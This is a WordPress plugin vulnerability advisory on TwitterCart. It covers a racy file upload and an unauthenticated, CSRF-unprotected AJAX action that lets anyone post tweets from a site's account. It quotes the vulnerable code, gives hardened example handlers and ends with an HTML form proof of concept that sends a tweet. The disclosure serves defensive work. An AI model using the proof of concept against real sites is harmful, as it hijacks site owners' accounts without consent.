9 Oct 2017

Tweet Sending Vulnerability in TwitterCart

It is not the best sign for the security of WordPress plugins that our proactive monitoring of changes made to plugins, which is intended to catch serious vulnerabilities, has repeatedly turned up other vulnerabilities while we were looking into a possible one. That was the case with the plugin TwitterCart.

In the function simple_tweet() we noticed code that could possibly allow for an arbitrary file upload vulnerability (in the file /includes/twitter.php):

$path = TC_PLUGIN_PATH . $_FILES['file']['name'];

move_uploaded_file($_FILES['file']['tmp_name'], $path);

We traced back how the code could be accessed and it looked like anyone could reach it. But when we tried to exploit the vulnerability we found that the file was not staying on the filesystem. The reason for that turned out to be that several lines later in the same function the file is removed:

unlink($path);

So unless you could cause an error to occur between the move and the unlink, the file is written and then removed almost immediately. Because it is written under the plugin's directory using the file name supplied by the client, its location is predictable for that short window, so you might be able to request the uploaded file before it is removed. That would make this a possible, if hard to exploit, vulnerability.
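As an added example (not TwitterCart's code), here is how a handler that only needs an uploaded image long enough to attach it to a tweet can avoid that window altogether: it never uses the client-supplied name to build a path, writes to a random name in the system temp directory instead of under the plugin's web-served directory, and unlinks in a finally block so an error cannot leave the file behind. It assumes it runs inside WordPress with wp-admin/includes/file.php loaded, so wp_tempnam() and wp_check_filetype_and_ext() are the real WordPress functions; the function name and the $send callback that would actually post the media are assumptions of the example.

```php
<?php
// Added example, not code from the TwitterCart plugin.
// Assumes WordPress is loaded and wp-admin/includes/file.php has been
// required (it defines wp_tempnam()). $send is a hypothetical callable that
// would post the media to Twitter; it receives the temp path and MIME type.

function tc_example_handle_media_upload( callable $send ) {
    if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        return new WP_Error( 'no_file', 'No uploaded file.' );
    }

    // Validate the type from the file's content and extension rather than
    // trusting the name the client sent; only raster images are accepted.
    $check = wp_check_filetype_and_ext(
        $_FILES['file']['tmp_name'],
        $_FILES['file']['name'],
        array(
            'jpg|jpeg' => 'image/jpeg',
            'png'      => 'image/png',
            'gif'      => 'image/gif',
        )
    );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        return new WP_Error( 'bad_type', 'Only JPEG, PNG and GIF images are accepted.' );
    }

    // A random name in the system temp dir: not served by the web server,
    // not guessable, and unrelated to $_FILES['file']['name']. Even a
    // request that raced the unlink would have no URL to aim at.
    $path = wp_tempnam( 'tc-media-' );
    if ( ! $path ) {
        return new WP_Error( 'tmp', 'Could not create temporary file.' );
    }

    try {
        if ( ! move_uploaded_file( $_FILES['file']['tmp_name'], $path ) ) {
            return new WP_Error( 'move', 'Could not store upload.' );
        }
        return $send( $path, $check['type'] );
    } finally {
        // Runs whether $send returns normally or throws, so an error in the
        // Twitter call cannot leave the upload on disk.
        if ( file_exists( $path ) ) {
            unlink( $path );
        }
    }
}

// Usage from an AJAX handler that has already passed its nonce and
// capability checks:
// $result = tc_example_handle_media_upload( function ( $path, $type ) {
//     // post $path to Twitter here and return the API response
// } );
```

The important design choice is the path: the original code's move-then-unlink is only a race because the file briefly exists at a location the attacker chose under a directory the web server serves. Taking both of those away removes the race rather than just narrowing it.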

But there seemed to be a more serious issue in the plugin based on where the upload code was located. The function simple_tweet() sends out a tweet, so that suggested that anyone could also send a tweet from the website's Twitter account through the plugin, which we then confirmed.

There were several security issues at play that caused this. First, the plugin registered the function tc_new_tweet() with both the wp_ajax_ and wp_ajax_nopriv_ hooks, so even those not logged in could reach it through WordPress' AJAX functionality (in the file /includes/actions.php):

add_action('wp_ajax_tc_new_tweet', 'tc_new_tweet');
add_action('wp_ajax_nopriv_tc_new_tweet', 'tc_new_tweet');

That function then called simple_tweet() without a capabilities check to make sure the request came from someone who should be able to send a tweet, and without checking for a valid nonce to prevent cross-site request forgery (CSRF). The missing nonce check means an attacker could also cause someone who is allowed to send a tweet to send one they didn't intend to (in the file /includes/functions.php):

function tc_new_tweet()
{
    require_once TC_PLUGIN_PATH . 'includes/twitter.php';
    simple_tweet($_POST['msg']);
}

There were quite a few other AJAX accessible functions that were similarly not secured.

After we notified the developer they released version 2.1, which fixes this vulnerability by removing the code shown above and most of the other AJAX accessible code. The remaining code was not fully fixed up: functions that look like they are only intended to be used by those logged in are still accessible to those not logged in, and there is still no capabilities check. CSRF protection was added, though, which limits how much those two remaining issues could be abused.
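To make concrete what the original hook-up was missing and what version 2.1 still leaves out, here is an added example (not TwitterCart's code, in any version) of an AJAX handler that is registered for logged-in users only, checks a nonce and checks a capability. The handler name tc_example_new_tweet, the script handle 'tc-example-admin' (assumed to be registered elsewhere) and the choice of manage_options as the required capability are assumptions of the example; check_ajax_referer(), current_user_can(), wp_send_json_error() and wp_localize_script() are the real WordPress functions.

```php
<?php
// Added example, not code from the TwitterCart plugin.
// Assumes WordPress is loaded and that the plugin's admin page enqueues a
// script with the handle 'tc-example-admin' (an assumption of the example).

// 1. Register only the wp_ajax_ hook. Without a wp_ajax_nopriv_ hook,
//    admin-ajax.php answers anonymous callers with "0" and never runs the
//    handler, which is the check the original code had no equivalent of.
add_action( 'wp_ajax_tc_example_new_tweet', 'tc_example_new_tweet' );

function tc_example_new_tweet() {
    // 2. CSRF: the nonce is bound to the current user and to this action.
    //    On failure check_ajax_referer() responds "-1" and dies, so nothing
    //    below runs for a request forged from another site.
    check_ajax_referer( 'tc_example_new_tweet', 'nonce' );

    // 3. Authorization: being logged in (any subscriber is) is not the same
    //    as being allowed to post from the site's Twitter account. This is
    //    the check the page notes is still absent in version 2.1.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Not allowed.' ), 403 );
    }

    // Only now touch the request data, and treat it as untrusted input.
    $msg = isset( $_POST['msg'] ) ? sanitize_textarea_field( wp_unslash( $_POST['msg'] ) ) : '';
    if ( '' === $msg ) {
        wp_send_json_error( array( 'message' => 'Empty message.' ), 400 );
    }

    require_once TC_PLUGIN_PATH . 'includes/twitter.php';
    wp_send_json_success( simple_tweet( $msg ) );
}

// Hand the nonce to the plugin's own admin page script so legitimate
// requests can include it as the 'nonce' POST field. A form hosted on an
// attacker's site, such as the proof of concept below, has no way to learn
// this value for the victim's session.
add_action( 'admin_enqueue_scripts', function () {
    wp_localize_script( 'tc-example-admin', 'tcExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'tc_example_new_tweet' ),
    ) );
} );
```

Each of the three checks stops a different attacker: dropping the nopriv hook stops the anonymous request the proof of concept relies on, the nonce stops a logged-in user being tricked into sending a tweet from another site, and the capability check stops a low-privilege account on the site itself.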

Proof of Concept

The following proof of concept will send out a tweet from the website.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="https://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tc_new_tweet" />
<input type="hidden" name="msg" value="Testing to see if plugin allows anyone to send out tweets through a website." />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • October 2, 2017 – Developer notified.
  • October 2, 2017 – Developer responds.
  • October 7, 2017 – Version 2.1 released, which fixes vulnerability.
